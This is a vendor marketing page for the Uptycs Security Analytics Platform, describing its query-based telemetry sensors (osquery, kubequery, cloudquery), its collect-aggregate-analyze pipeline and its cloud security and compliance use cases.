Observe & Secure Cloud-Native Attack Surfaces

The Uptycs Security Analytics Platform

The Uptycs Security Analytics Platform is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure. Most security stacks don’t make it easy to get the answers you need, and lack the transparency required to conduct forensics. But with unified observability across productivity endpoints, server workloads, container runtimes and orchestration systems, cloud providers, SaaS applications, and identity providers, Uptycs empowers security teams with actionable answers across their attack surface to improve enterprise-wide security. 

If you’re struggling with questions like, “What containers in my environment are running this known vulnerable package?” or “Where else is this file hash appearing across my Kubernetes Cluster?” or “How many servers have had the password rotated in the last 90 days?”, Uptycs gives you the ability to get all the answers from the same console.

What questions do you have for your environment?

One Platform, Multiple Solutions

Meet your cloud-native security solution stack. The Uptycs platform is composed of:

1. Telemetry sourced from across the cloud-native attack surface
2. A powerful analytics engine and data pipeline
3. Data summarizations and visualizations that solve for multiple solutions including Cloud Workload Protection (CWPP), Cloud Security Posture Management (CSPM), eXtended Detection & Response (XDR), Insight & Inventory, and Audit, Compliance & Governance.
   
   

The Cloud-Native Attack Surface

The modern defenders' attack surface is different:

• Data no longer lives on the corporate network alone
• Work isn’t done just from “the office”
• Workloads are ephemeral and dynamic
• Identity and access systems are today’s firewall
• Sensitive data lives in cloud-based apps like GSuite, Office 365, Salesforce, GitHub, and Slack

To protect the cloud-native attack surface, you must first be able to observe it. Wherever it might be. 

Using query-based sensors aligned to cloud-native asset classes—hosts, VMs, containers, orchestration systems, cloud providers, SaaS applications, and identity providers -- telemetry is continuously streamed over a secure TLS connection, aggregated, and analyzed in the Uptycs Security Analytics Platform.

The tool suite behind our telemetry-powered approach consists of: 

• osquery for hosts, VMs, containers
• kubequery for container orchestration systems
• cloudquery for cloud providers
• saasquery for SaaS applications (coming soon!)
• identityquery for identity providers (coming soon!)
  
  

How The Uptycs Security Analytics Platform Works

With the relevant query-based sensors active, The Uptycs Security Analytics Platform immediately begins ingesting and analyzing telemetry, normalized in a tabular format so that you have connected insights across all of your asset classes in the same place.  

The Uptycs Security Analytics Platform can be visualized as a data engineering pipeline with three stages:

1. Collect
2. Aggregate
3. Analyze

In the collection phase, telemetry is captured via agent deployment to the host (osquery) or via native API integrations (kubequery, cloudquery) and transferred to the Uptycs backend using an HTTP TLS connection. The telemetry can be bucketed into two broad areas based on the attack surface:

• The first grouping of telemetry is based on osquery’s ability to interface with operating system interfaces such as kaudit, eBPF on Linux, ETW on Windows, and OpenBSM or the new security API framework on macOS. Osquery uses these interfaces to collect system call behavior and then translates it into a tabular JSON format. 

•  In the second grouping, cloudquery and kubequery use native API integrations to ingest data and translate it into a structured table format. 

The tabular telemetry can be acted upon both while it’s streaming (for real-time correlation and alerting) and once it's been aggregated and stored (for reporting and ad hoc historical querying).

The aggregation phase is where Uptycs’ speed and scale truly shines. Our eXtended Detection Network (XDN) applies scaling techniques, such as consistent hashing for horizontal scaling based on HTTP and TLS load balancing techniques to reliably spread the load and ingestion of the data. The Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. For example, a fleet of 100,000 machines, multiple concurrent Kubernetes clusters, and thousands of AWS accounts each providing configuration, CloudTrail activity, and AWS Flow Logs, can simultaneously connect and transmit telemetry to the Uptycs backend. 

The XDN also facilitates cohort analysis. An example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on this single machine is then converted into a real-time query that then evaluates the other 999 machines.

In the analyze phase, Lambda analytics are used to analyze data while it’s in flight for near real-time correlation. While in flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be historically analyzed at scale. 

This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals. These signals are correlated into tens of detections, making it possible for humans and automation to actually consume the insight and make data-driven decisions during investigations, for forensics efforts, and for evidence retrieval as a part of a compliance requirement.

Security Problems Uptycs Can Solve

Insights from the telemetry collected and analyzed across your cloud-native attack surface are presented as dashboards, reports, or alerts that solve for multiple security, IT, and compliance needs.

Using standards-based summarizations and visualizations, the Uptycs Security Analytics Platform helps teams solve for proactive audit and compliance-based requirements, and reactive detection and response based requirements. 

For the purpose of Detection & Response, Uptycs applies the MITRE ATT&CK framework. For organizations that need to meet baseline Audit & Compliance or domain-specific compliance regulations, Uptycs is able to provide analytics to ensure that their business has the right security hygiene and meets the necessary regulatory compliance standards.

Together, these proactive and reactive controls—along with complete transparency into your security analytics—solve for multiple needs:

• Cloud Workload Protection (CWPP): Comprehensive security observability and compliance for your cloud workloads and cloud infrastructure. 
• Cloud Security Posture Management (CSPM): Simplify the task of hardening your cloud attack surface and enforcing adherence to best practices, such as those defined by the CIS Benchmarks.
• eXtended Detection & Response (XDR): Unify telemetry from your modern attack surfaces for comprehensive detection and response capabilities, moving beyond discrete alerts.
• Insight & Inventory: Automate asset inventory for your entire endpoint fleet (macOS, Windows and Linux). Identify anomalous activity compared to normal baseline.
• Audit, Compliance & Governance: Simplify IT auditing and get instant compliance posture visibility to improve security governance.